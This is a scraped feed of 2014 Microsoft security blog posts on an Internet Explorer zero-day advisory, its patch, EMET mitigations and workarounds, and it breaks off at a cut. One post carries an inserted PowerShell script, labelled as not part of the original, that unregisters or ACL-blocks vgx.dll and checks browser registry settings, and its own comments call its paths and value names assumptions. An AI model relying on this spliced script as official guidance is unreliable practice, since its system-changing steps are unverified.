Childs0<p><span style="font-family:Calibri;font-size:small;">Today, we released a </span><a href="https://technet.microsoft.com/library/security/ms14-021"><span style="color:#0563c1;font-family:Calibri;font-size:small;">security update</span></a><span style="font-family:Calibri;font-size:small;"> to address the Internet Explorer (IE) vulnerability first described in </span><a href="https://technet.microsoft.com/library/security/2963983"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Security Advisory 2963983</span></a><span style="font-family:Calibri;font-size:small;">. This security update addresses every version of Internet Explorer. </span></p> <p><span style="font-family:Calibri;font-size:small;">While we&rsquo;ve seen only a limited number of targeted attacks, customers are advised to install this update promptly. The majority of our customers have automatic updates enabled and so will not need to take any action as protections will be downloaded and installed automatically. If you&rsquo;re unsure if you have automatic updates, or you haven&rsquo;t enabled </span><a href="http://windows.microsoft.com/en-US/windows/help/windows-update"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Automatic Update</span></a><span style="font-family:Calibri;font-size:small;">, now is the time.&nbsp; </span></p> <p><span style="font-family:Calibri;font-size:small;">For those manually updating, we strongly encourage you to apply this update as quickly as possible, following the directions in the released security bulletin.</span></p> <p><span style="font-family:Calibri;"><span style="font-size:small;">We have made the decision to issue a security update for Windows XP users. Windows XP is no longer supported by Microsoft, and we continue to encourage customers to migrate to a modern operating system, such as Windows 7 or 8.1. Additionally, customers are encouraged to upgrade to the latest version of Internet Explorer, IE 11. 
You can find more information on the Microsoft Security Bulletin </span></span><a href="https://technet.microsoft.com/library/security/ms14-may"><span style="font-family:Calibri;font-size:small;">summary webpage</span></a><span style="font-family:Calibri;font-size:small;">.</span></p> <p><span style="font-family:Calibri;font-size:small;">We invite you to join Jonathan Ness and myself for a live webcast at 11 a.m. PDT tomorrow, where we&rsquo;ll provide a detailed review of the bulletin. You can register </span><a href="https://msevents.microsoft.com/CUI/InviteOnly.aspx?EventID=7F-7C-CD-0D-1D-9F-4D-AC-46-22-BC-40-40-E8-D9-93"><span style="color:#0563c1;font-family:Calibri;font-size:small;">here</span></a><span style="font-family:Calibri;font-size:small;">. </span></p> <p><span style="font-family:Calibri;font-size:small;">*<em>Updated 5/2/2014 - The 11 a.m. webcast has reached <span style="color:black;font-family:&#39;Segoe UI&#39;,&#39;sans-serif&#39;;font-size:10pt;">capacity, so a second webcast has been scheduled for 2 p.m. on Friday, May 2. 
Details on registration can be found <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032587812&amp;Culture=en-US&amp;community=0">here</a>.</span></em><br /></span></p> <p><span style="font-family:Calibri;font-size:small;">For more information, please see the Microsoft News </span><a href="http://blogs.technet.com/b/microsoft_blog/archive/2014/05/01/updating-internet-explorer-and-driving-security.aspx"><span style="color:#0563c1;font-family:Calibri;font-size:small;">blog</span></a><span style="font-family:Calibri;font-size:small;">.<br /> <br /> </span><a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Dustin Childs</span></a><br /><span style="font-family:Calibri;font-size:small;"> Group Manager, Response Communications<br /> Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628656&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Bulletin WebcastSecurity Bulletinssecurity bulletin releaseOOBInternet Explorer (IE) Out-of-Band Release to Address Microsoft Security Advisory 2963983http://blogs.technet.com/b/msrc/archive/2014/05/01/out-of-band-release-to-address-microsoft-security-advisory-2963983.aspxThu, 01 May 2014 15:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e0e91710-8024-427c-9ce4-a9347bf8a814Dustin C. Childs0<p><span style="font-family:Calibri;font-size:small;">At approximately 10 a.m. PDT, we will release an out-of-band security update to address the issue affecting Internet Explorer (IE) that was first discussed in Security Advisory 2963983. This update is fully tested and ready for release for all affected versions of the browser. 
</span></p> <p><span style="font-family:Calibri;"><span style="font-size:small;">The majority of customers have automatic updates enabled and will not need to take any action because protections will be downloaded and installed automatically. If you&rsquo;re unsure if you have automatic updates, or you haven&rsquo;t enabled </span></span><a href="http://windows.microsoft.com/en-US/windows/help/windows-update"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Automatic Update</span></a><span style="font-family:Calibri;font-size:small;">, now is the time.&nbsp; </span></p> <p><span style="font-family:Calibri;font-size:small;">For those manually updating, we strongly encourage you to apply this update as quickly as possible following the directions in the released security bulletin.</span></p> <p><span style="font-family:Calibri;"><span style="font-size:small;">We have made the decision to issue a security update for Windows XP users. Windows XP is no longer supported by Microsoft, and we continue to encourage customers to migrate to a modern operating system, such as Windows 7 or 8.1. Additionally, customers are encouraged to upgrade to the latest version of Internet Explorer, IE 11.</span></span></p> <p><span style="font-family:Calibri;font-size:small;">Please join us tomorrow at 11 a.m. PDT for a webcast where we will present information on the bulletin. </span></p> <p><span style="font-family:Calibri;font-size:small;">Registration information:</span></p> <p><span style="font-family:Calibri;font-size:small;">Date: Friday, May 2, 2014<br /> Time: 11:00 a.m. 
PDT <br /> Registration: </span><a href="https://msevents.microsoft.com/CUI/InviteOnly.aspx?EventID=7F-7C-CD-0D-1D-9F-4D-AC-46-22-BC-40-40-E8-D9-93"><span style="color:#0563c1;font-family:Calibri;font-size:small;">https://msevents.microsoft.com/CUI/InviteOnly.aspx?EventID=7F-7C-CD-0D-1D-9F-4D-AC-46-22-BC-40-40-E8-D9-93</span></a></p> <p><span style="font-family:Calibri;font-size:small;">More information about the upcoming security bulletin can be found at Microsoft&rsquo;s </span><a href="https://technet.microsoft.com/library/security/ms14-may"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Advance Notification Service (ANS) webpage</span></a><span style="font-family:Calibri;font-size:small;">.You can also stay apprised of the MSRC team&rsquo;s recent activities by following us on Twitter at </span><a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;font-family:Calibri;font-size:small;">@MSFTSecResponse</span></a><span style="font-family:Calibri;font-size:small;">.&nbsp;</span></p> <p><span style="font-family:Calibri;font-size:small;">Thank you,<br /> </span><a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;font-family:Calibri;font-size:small;">Dustin Childs</span></a><br /><span style="font-family:Calibri;font-size:small;"> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628629&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Security BulletinOOBInternet Explorer (IE) Continuing with Our Community Driven, Customer Focused Approach for EMEThttp://blogs.technet.com/b/srd/archive/2014/04/30/continuing-with-our-community-driven-customer-focused-approach-for-emet.aspxWed, 30 Apr 2014 18:06:04 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:59b5f803-7ef1-463d-ac64-88b3c9eab15aswiat0<p><span 
style="font-family:Calibri;font-size:medium;">The Enhanced Mitigation Experience Toolkit, best known as EMET, helps raise the bar against attackers gaining access to computer systems. Since the first release of EMET in 2009, our customers and the security community have adopted EMET and provided us with valuable feedback. Feedback both in </span><a href="http://social.technet.microsoft.com/Forums/en/emet/threads" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">forums</span></a><span style="font-family:Calibri;font-size:medium;"> and through </span><a href="http://www.microsoft.com/en-us/microsoftservices/support.aspx" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Premier Support Services</span></a><span style="font-family:Calibri;font-size:medium;">, which provides enterprise support for EMET, has helped shape the new EMET capabilities to further expand the range of scenarios it addresses.</span></p> <p><span style="font-family:Calibri;font-size:medium;">Today, we will be talking about how we are taking our community driven and customer focused approach even further. We will cover both the present version (4.1) as well as the future versions (5.0 Technical Preview and beyond) in detail next.</span></p> <p><span style="font-size:medium;"><span style="font-family:Calibri;">What you are about to read is the outcome of our work over the past couple of months listening to customer and community feedback. 
Keep in mind that we are always working on new things, so&hellip; stay tuned!&nbsp;:)</span><span style="font-family:Calibri;"> As always, please </span></span><a href="mailto:emet_feedback@microsoft.com"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">let us know</span></a><span style="font-family:Calibri;font-size:medium;"> what you think.</span></p> <p><span style="font-family:Calibri;font-size:medium;">- The EMET Team</span></p> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <h1><span style="font-family:Calibri Light;">EMET 5.0 Technical Preview available on Microsoft Connect</span></h1> <span style="font-family:Times New Roman;font-size:medium;"> </span></div> <p><span style="font-family:Calibri;font-size:medium;">The release of EMET 5.0 Technical Preview in late February had a tremendous response from customers and the industry. We have received a lot of feedback on the new features and how they can be further improved. We believe EMET is and should continue to be customer-driven, where the feedback we receive is an integral part of our development process. In order to facilitate and streamline the communication between you (our beloved customers) and us (the EMET team), we have decided to create a project on </span><a href="https://connect.microsoft.com/directory/?keywords=EMET" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Connect for EMET 5.0 Technical Preview</span></a><span style="font-family:Calibri;font-size:medium;">. Simply access the Microsoft Connect tool to download packages &ndash; which will be released periodically and frequently &ndash; and have a taste of what is coming up for EMET 5.0. 
What is great about this new tool is that, you will able to provide direct feedback, respond to surveys, and find all the new additions.</span></p> <p><span style="font-family:Calibri;font-size:medium;">The first download package for EMET 5.0 Technical Preview is already available, and it includes fixes for many items reported to us. Please subscribe to the </span><a href="https://connect.microsoft.com/directory/?keywords=EMET" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Connect for EMET 5.0 Technical Preview</span></a><span style="font-family:Calibri;font-size:medium;"> (you will need a Microsoft Account for that), download the installation package and continue to send your great ideas to us. </span></p> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <h1><span style="font-family:Calibri Light;">EMET 4.1 Update 1</span></h1> <span style="font-family:Times New Roman;font-size:medium;"> </span></div> <p><span style="font-family:Calibri;font-size:medium;">Today, we are releasing EMET 4.1 Update 1, which contains improvements and bug-fixes. More details on the list of the introduced improvements are available at this </span><a href="https://support.microsoft.com/kb/2964759" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">KB article</span></a><span style="font-family:Calibri;font-size:medium;">. These improvements are the outcome of the feedback you have given us and the forward thinking work we continue to do. We recommend all EMET 4.1 customers </span><a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">download this new version</span></a><span style="font-family:Calibri;font-size:medium;"> and install it, since the benefits of all these improvements are noticeable. 
The upgrade experience is seamless, as all the current settings can be kept as-is by choosing &ldquo;Keep Existing Settings&rdquo; option during the install process. We also recommend all EMET 3.0 and 4.0 customers to upgrade to EMET 4.1 Update 1 (remember EMET 3.0 will go out of support next June!).</span></p> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <h1><span style="font-family:Calibri Light;">Certificate Trust default rules update</span></h1> <span style="font-family:Times New Roman;font-size:medium;"> </span></div> <p><span style="font-family:Calibri;font-size:medium;">With EMET 4.0, we introduced the Certificate Trust, which is a feature that detects Man in the Middle attacks that leverage maliciously-issued SSL/TLS certificates. The feature works through a configurable certificate-pinning mechanism, which binds the certificate for a specified website to a trusted Root Certificate Authority (Root CA). This feature comes pre-configured with a set of rules related to authentication portals for Microsoft services and other third-party services. These default rules used in Certificate Trust don&rsquo;t require frequent updates. It can happen, however, that an organization decides to renew its SSL/TLS certificate, for different reasons (e.g. natural aging of the certificate, change in their PKI infrastructure, response to a security incident, etc.). When a change like this occurs, the renewed SSL/TLS certificate may be issued under a different Root CA not included in the default Certificate Trust configuration, resulting in EMET detecting the new certificate as malicious. 
</span></p> <p><span style="font-family:Calibri;font-size:medium;">Since several SSL/TLS certificates for many popular third-party websites were recently updated, we are </span><a href="http://support.microsoft.com/kb/2961016" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">releasing an easy-to-install Fix it solution</span></a><span style="font-family:Calibri;font-size:medium;"> that will update the default Certificate Trust rules while maintaining the ones that you have manually added. The Fix it can either be installed on a standalone machine by double-clicking it, or be silently deployed throughout a network with your favorite deployment mechanism. If you have just downloaded and installed EMET 4.1 Update 1, you don&rsquo;t need to apply this Fix it solution, as the new rules are already included. You can use the link below to download this solution:</span></p> <p align="center"><a href="http://go.microsoft.com/?linkid=9846110"><img title="Microsoft Fix it 51012" style="border:0px currentColor;" alt="Microsoft Fix it 51012" src="http://blogs.technet.com/resized-image.ashx/__size/142x54/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0574.fixit.png" /></a></p> <p align="center"><a title="Microsoft Fix it" href="http://go.microsoft.com/?linkid=9846110" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Fix this problem</span></a><br /><span style="font-family:Calibri;font-size:medium;"> Microsoft Fix it 51012</span></p><div style="clear:both;"></div>EMET Protection strategies for the Security Advisory 2963983 IE 0dayhttp://blogs.technet.com/b/srd/archive/2014/04/30/protection-strategies-for-the-security-advisory-2963983-ie-0day.aspxWed, 30 Apr 2014 15:03:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:2bdd67b0-85d2-4512-ae36-aee53ecc634bSRD Blog 
Author0<p>We&rsquo;ve received a number of customer inquiries about the workaround steps documented in <a href="https://technet.microsoft.com/en-us/library/security/2963983.aspx">Security Advisory 2963983</a> published on Saturday evening. We hope this blog post answers those questions.</p> <p><b>Steps you can take to stay safe</b></p> <p>The security advisory lists several options customers can take to stay safe. Those options are (in summary):</p> <ul> <li>Deploy the Enhanced Mitigation Experience Toolkit (EMET)</li> <li>Block access to VGX.DLL</li> <li>Enable Enhanced Protected Mode</li> <li>Use built-in Internet Explorer configuration options to disable active scripting</li> </ul> <p>We&rsquo;ll address the questions we have heard from customers in relation to each of those options.</p> <p><b>Update on Enhanced Mitigation Experience Toolkit (EMET) protections</b></p> <p>The original <a href="https://technet.microsoft.com/en-us/library/security/2963983.aspx">security advisory</a> and the <a href="http://blogs.technet.com/b/srd/archive/2014/04/26/more-details-about-security-advisory-2963983-ie-0day.aspx">SRD blog post from this past week</a> both listed EMET 4.1 as effective in helping to block attacks. In our deeper analysis of the two exploit samples we have, we found that EMET 4.0 is also effective in helping to block attacks. The advisory and blog have both been updated to point out that both EMET 4.0 and EMET 4.1 are effective. Our technical preview of EMET version 5.0 is also effective in this regard; however, we do not recommend a technical preview for production deployment. Several customers asked which specific EMET mitigations were effective in helping to block attacks. 
We&rsquo;ve prepared the following table to answer those questions:</p> <table border="1"> <tbody> <tr> <td><b>Mitigation</b></td> <td><b>EMET 4.0 / EMET 4.1</b></td> <td><b>EMET 5 Tech Preview</b></td> </tr> <tr> <td>Heapspray Protection</td> <td>Effective</td> <td>Effective</td> </tr> <tr> <td>StackPivot ROP Mitigation</td> <td>Effective with Deep Hooks enabled</td> <td>Effective</td> </tr> <tr> <td>Caller ROP Mitigation</td> <td>Effective with Deep Hooks enabled</td> <td>Effective</td> </tr> <tr> <td>MemProt ROP Mitigation</td> <td>Effective with Deep Hooks enabled</td> <td>Effective</td> </tr> <tr> <td>EAF+</td> <td>Not present. EMET 4.x EAF does not block this attack.</td> <td>Effective</td> </tr> <tr> <td>Attack Surface Reduction</td> <td>Not present</td> <td>Effective because it blocks VGX.DLL and FLASH.ocx in Internet Zone</td> </tr> </tbody> </table> <p>As you can see, three of the four EMET 4.x mitigations capable of blocking this attack required the Deep Hooks feature to be enabled. Deep Hooks extends the ROP mitigations&rsquo; checks from the top-level Win32 APIs to the lower-level functions those APIs call; the attackers in this case leveraged ZwProtectVirtualMemory, which is not protected unless Deep Hooks is enabled. Deep Hooks is not enabled in the default configuration for EMET 4.0 or EMET 4.1. The default EMET 4.x install was effective in helping to block attacks due to the Heapspray mitigation alone; however, the ROP mitigations are more robust and less likely to be bypassed than the Heapspray mitigation, so we recommend enabling Deep Hooks to get the full protection of the ROP mitigations.</p> <p>EMET 4.1 Update 1 is scheduled for release on the Microsoft Download Center today. It was primarily produced to address minor bug fixes; however, it also enables Deep Hooks by default for EMET 4.1. 
We will post an additional SRD blog post when the EMET 4.1 Update 1 bits are live, with a link to the KB describing the new release.</p> <p><b>Clarifying the VGX.DLL workaround</b></p> <p>The exploits we have seen have relied on Vector Markup Language (VML) to trigger the use-after-free vulnerability. As we analyzed different ways to trigger this vulnerability, we concluded that additional attacker research would be required to develop an exploit that did not rely on the presence of VML. Therefore, we recommended in the original security advisory that customers disable VGX.dll, the library that provides VML functionality. Customers can choose either to ACL the file or to unregister the DLL. Unregistering the DLL can be accomplished with a single command line, silently, with no user interaction, and may be scripted to run via Microsoft System Center Configuration Manager or other infrastructure management solutions. VML is not natively supported by most web browsers today, so this remediation option may have the least impact on enterprise web app compatibility.</p> <p>However, we&rsquo;d like to clarify that VGX.DLL does not contain the vulnerable code leveraged in this exploit. Disabling VGX.DLL is an exploit-specific workaround: it provides immediate, effective protection against the known attacks, but not against a future exploit that reaches the vulnerable code without VML.</p> <p><b>Clarifying the IE Enhanced Protected Mode workaround</b></p> <p>We also received questions about the Internet Explorer Enhanced Protected Mode workaround. Enhanced Protected Mode will help protect 64-bit Internet Explorer users from this attack. There is a difference between Internet Explorer 10 and Internet Explorer 11 that led to some confusion: Internet Explorer 10 has one setting to enable and Internet Explorer 11 has two. The 64-bit aspect of Internet Explorer is a key element of this workaround, as the heap spray attack is not effective in the 64-bit address space, leading to a failed exploit. 
Enhanced Protected Mode alone on 32-bit Internet Explorer 11 is not effective in blocking the attack. The screenshots below illustrate the Internet Explorer 10 versus Internet Explorer 11 &ldquo;checkbox&rdquo; differences:</p> <table border="1"> <tbody> <tr> <td>IE10 64bit EPM (one setting to mitigate)</td> <td>IE11 64bit EPM (two settings to mitigate)</td> </tr> <tr> <td><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm1.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm1.png" border="0" /></a></td> <td><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm2.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/epm2.png" border="0" /></a></td> </tr> </tbody> </table> <p><b>Choosing the best workaround for your environment</b></p> <p>The security advisory provides several different recommended workarounds because each customer environment is different and there might be a different &ldquo;best&rdquo; workaround for different customers. 
Each workaround has different pros and cons, described below.</p> <ul> <li>Option 1: Deploy the Enhanced Mitigation Experience Toolkit <ul> <li>Pro: As described above, helps block exploits leveraging this vulnerability by adding several different hardening mechanisms to Windows.</li> <li>Pro: Even after the eventual security update is applied, continues providing protection against other potential security vulnerabilities in Microsoft&rsquo;s and third-party products.</li> <li>Con: Microsoft recommends testing before deploying widely across an enterprise network, as previous versions of EMET have introduced application compatibility issues.</li> </ul> </li> <li>Option 2: Block access to VGX.dll <ul> <li>Pro: Very simple workaround; easy and quick to deploy across an enterprise network.</li> <li>Con: May not protect against future or new exploits that may emerge for this vulnerability.</li> </ul> </li> <li>Option 3: Enable Enhanced Protected Mode on 64-bit Internet Explorer <ul> <li>Pro: Helps block exploits leveraging this vulnerability and potentially other vulnerabilities that may be discovered in the future.</li> <li>Con: Requires 64-bit Windows and the 64-bit version of Internet Explorer.</li> </ul> </li> </ul> <p>In general, for customers that already have EMET 4.x deployed, enabling Deep Hooks is likely to be the best workaround option. For customers who have not yet deployed EMET 4.x, the priority should be on immediate, quick protection, which is likely to be blocking access to VGX.dll. Deploying EMET is the best long-term protection, but doing so without first testing in your environment is unlikely to be the best option. 
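</p> <p>As an added example (this script is not part of the post or of Security Advisory 2963983), the following PowerShell audits one machine for two of the workarounds discussed above, blocking VGX.dll and 64-bit Enhanced Protected Mode, and can apply the VGX.dll one. The vgx.dll locations, the Isolation, Isolation64Bit and svcVersion registry values, and the icacls form of the &ldquo;ACL the file&rdquo; option are assumptions about the standard Windows and Internet Explorer layout, not details taken from the post.</p>

```powershell
# Added example, not code from the advisory or the SRD post: audit a machine for
# two of the workarounds above (VGX.dll blocked, 64-bit Enhanced Protected Mode)
# and optionally apply the VGX.dll one. File paths and registry value names are
# assumptions based on the standard Windows/IE layout, not taken from the post.
param(
    [switch]$Apply,                          # actually unregister / ACL vgx.dll (needs an elevated shell)
    [ValidateSet('Unregister', 'Acl')]
    [string]$Method = 'Unregister'
)

function Get-VgxPaths {
    # Assumed location of the VML library; 64-bit Windows carries both copies.
    $candidates = @(Join-Path $env:CommonProgramFiles 'Microsoft Shared\VGX\vgx.dll')
    if (${env:CommonProgramFiles(x86)}) {
        $candidates += Join-Path ${env:CommonProgramFiles(x86)} 'Microsoft Shared\VGX\vgx.dll'
    }
    $candidates | Where-Object { Test-Path $_ }
}

function Get-VgxRegistrations {
    # A COM server is registered while some CLSID's InprocServer32 points at it,
    # so enumerate those (native and WOW64 views) instead of hard-coding VML's CLSID.
    $hives = 'HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'
    Get-ChildItem $hives -ErrorAction SilentlyContinue | ForEach-Object {
        $srv = Get-ItemProperty -Path (Join-Path $_.PSPath 'InprocServer32') -ErrorAction SilentlyContinue
        if ($srv -and $srv.'(default)' -match '(?i)vgx\.dll$') { $_.PSChildName }
    }
}

function Disable-Vgx {
    param([string]$How)
    foreach ($dll in Get-VgxPaths) {
        if ($How -eq 'Unregister') {
            # The single-command workaround: silently unregister the VML COM server.
            & "$env:SystemRoot\System32\regsvr32.exe" /s /u "$dll"
            if ($LASTEXITCODE -ne 0) { Write-Warning "regsvr32 /u failed for $dll (exit $LASTEXITCODE)" }
        } else {
            # The "ACL the file" alternative: deny all access to Everyone (SID S-1-1-0).
            & "$env:SystemRoot\System32\icacls.exe" "$dll" /deny '*S-1-1-0:(F)'
        }
    }
}

function Get-EpmState {
    # Assumed IE registry layout: Isolation=PMEM means EPM is on; IE11 additionally
    # needs Isolation64Bit=1 for 64-bit tab processes (the second checkbox).
    $main = Get-ItemProperty 'HKCU:\Software\Microsoft\Internet Explorer\Main' -ErrorAction SilentlyContinue
    $ver  = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Internet Explorer' -ErrorAction SilentlyContinue).svcVersion
    $epm  = ($main.Isolation -eq 'PMEM')
    $tabs64 = if ($ver -like '10.*') { $epm } else { $epm -and ($main.Isolation64Bit -eq 1) }
    [pscustomobject]@{
        IEVersion      = $ver
        EPMEnabled     = $epm
        Is64BitWindows = [Environment]::Is64BitOperatingSystem
        # EPM on 32-bit IE does not stop the heap spray; only 64-bit tabs do.
        Mitigated      = [Environment]::Is64BitOperatingSystem -and $tabs64
    }
}

$regs = @(Get-VgxRegistrations)
"VML COM registrations present: $($regs.Count)"
if ($Apply -and $regs.Count -gt 0) {
    Disable-Vgx -How $Method
    if ($Method -eq 'Unregister') { "VML COM registrations after: $(@(Get-VgxRegistrations).Count)" }
}
Get-EpmState | Format-List
```

<p>Run it without -Apply first to see the current state; the same script is what would be pushed through Configuration Manager or a similar tool to apply the workaround in bulk. Remember to reverse the workaround (regsvr32 without /u, or removing the deny entry) once the security update is installed; otherwise VML stays disabled for any line-of-business application that still depends on it.</p> <p>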
As always, we recommend staying up-to-date with the latest version of Internet Explorer for improved security features such as Enhanced Protected Mode, better backward compatibility through Enterprise Mode, increased performance, and support for the modern web standards that run today&rsquo;s websites and services.</p> <p><b>Conclusion</b></p> <p>We hope that this blog post helps guide you in choosing the best mitigation strategy for your environment. The Internet Explorer team is hard at work preparing a security update that will be released as soon as it is ready for broad deployment. Stay tuned to the Microsoft Security Response Center (MSRC) blog [link] for any news about the availability of an update.</p> <p>- Elia Florio and Jonathan Ness, MSRC Engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628491&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MitigationsworkaroundsInternet Explorer (IE)0-dayEMET Security Trends in Cloud Computing Part 1: Financial Serviceshttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspxTue, 29 Apr 2014 17:46:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:5088c27b-1670-4cb4-90e4-8ed342bed2dfTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>In 2012, Microsoft Trustworthy Computing launched the <a target="_blank" href="https://roianalyst.alinean.com/msft/AutoLogin.do?d=563612287085088525">Cloud Security Readiness Tool</a> (CSRT) to help organizations understand their current IT infrastructure, identify relevant industry regulations, and evaluate whether cloud adoption will meet their business needs.&nbsp;</p> <p>The aggregate data from the survey have also provided some interesting insights, and we&rsquo;ll be sharing some of those findings in a four-part blog series beginning today. 
We&rsquo;ll take a closer look at four specific industries &ndash; financial services, healthcare, retail and public sector (government), and examine how cloud adoption could reduce security risks in those industries.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx">read more</a>)cloud securityCustomersrisk managementRecoveryAdrienne HallCloudcustomer perspectiveITcloud trust studyCloud Computingresearchcloud servicesTrustworthy ComputingMicrosoftDataIT Pros More Details about Security Advisory 2963983 IE 0dayhttp://blogs.technet.com/b/srd/archive/2014/04/26/more-details-about-security-advisory-2963983-ie-0day.aspxSun, 27 Apr 2014 02:44:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ad02d6f7-f565-4cd8-bd7f-8c372d1b1e9fswiat0<p>Today we released <a title="Security Advisory 2963983" href="https://technet.microsoft.com/en-US/library/security/2963983">Security Advisory 2963983</a> regarding a potential vulnerability in Internet Explorer reported by FireEye and currently under investigation.</p> <p>We are working closely with <a title="FireEye" href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html">FireEye</a> to investigate this report of a vulnerability that was found used in very limited, targeted attacks:</p> <ul> <li>the vulnerability is a &ldquo;use-after-free&rdquo; memory corruption, and the exploit observed seems to target IE9, IE10 and IE11;</li> <li>while the vulnerability affects Internet Explorer, the exploit relies heavily on two other components to successfully trigger code execution; in particular, it requires the presence of the VML and Flash components.</li> </ul> <p>Our partner FireEye posted an analysis with some details and confirmed that the exploit wasn&rsquo;t able to run successfully when EMET protection is added for Internet Explorer. The following EMET configuration can help to mitigate this specific exploit seen in the wild:</p> <ul> <li>EMET 4.0 / 4.1: all mitigations enabled, Deep Hooks and Anti Detours enabled</li> <li>EMET 5.0 TP: all mitigations enabled (including ASR/EAF+), Deep Hooks and Anti Detours enabled</li> </ul> <p>Also, given the current details shared by FireEye, we believe that the exploit can also be mitigated by:</p> <ul> <li>disabling VML in IE;</li> <li>running Internet Explorer in the &ldquo;Enhanced Protected Mode&rdquo; configuration and 64-bit process mode, which is available for IE10 and IE11 in the Internet Options settings:</li> </ul> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/EPM.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/EPM.png" border="0" /></a></p> <p><span>Cristian Craioveanu,&nbsp;Elia Florio and Chengyun Chu, MSRC Engineering</span></p><div style="clear:both;"></div>EMET IE 0day Microsoft releases Security Advisory 2963983http://blogs.technet.com/b/msrc/archive/2014/04/26/microsoft-releases-security-advisory.aspxSun, 27 Apr 2014 02:25:12 
GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ca0fc134-646d-41ab-b12f-073d0635dbc9Dustin C. Childs0<p>Today, we released <a href="https://technet.microsoft.com/en-US/library/security/2963983">Security Advisory 2963983</a> regarding an issue that impacts Internet Explorer. At this time, we are only aware of limited, targeted attacks. This issue allows remote code execution if users visit a malicious website with an affected browser. This would typically occur by an attacker convincing someone to click a link in an email or instant message.</p> <p>Our initial investigation has revealed that Enhanced Protected Mode, on by default for the modern browsing experience in Internet Explorer 10 and Internet Explorer 11, as well as <a href="http://support.microsoft.com/kb/2458544">Enhanced Mitigation Experience Toolkit (EMET) 4.1</a> and&nbsp;EMET 5.0 Technical Preview, will help protect against this potential risk. We also encourage you to follow the &quot;Protect Your Computer&quot; guidance of enabling a firewall, applying all software updates and installing anti-virus and anti-spyware software. Additionally, we encourage everyone to exercise caution when visiting websites and avoid clicking suspicious links, or opening email messages from unfamiliar senders. 
Additional information can be found at <a href="http://www.microsoft.com/protect"><span style="color:#0563c1;">www.microsoft.com/protect</span></a>.</p> <p>We are monitoring the threat landscape very closely and will continue to take appropriate action to help protect customers.</p> <p>Thank you,<br /> <br /> <a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a><br /> Group Manager, Response Communications<br /> Trustworthy Computing</p> <p></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3628234&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">AdvisoryZero-Day ExploitSecurityInternet Explorer (IE)Vulnerability Microsoft’s commitment to the Core Infrastructure Initiativehttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/24/microsoft-s-commitment-to-the-core-infrastructure-initiative.aspxThu, 24 Apr 2014 22:21:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8dfed93b-8aa7-4a92-80f8-098c9183e51cTrusted Cloud Team0<p><strong>By Steve Lipner, Partner Director of Software Security, Microsoft Corporation</strong></p> <p><a target="_blank" 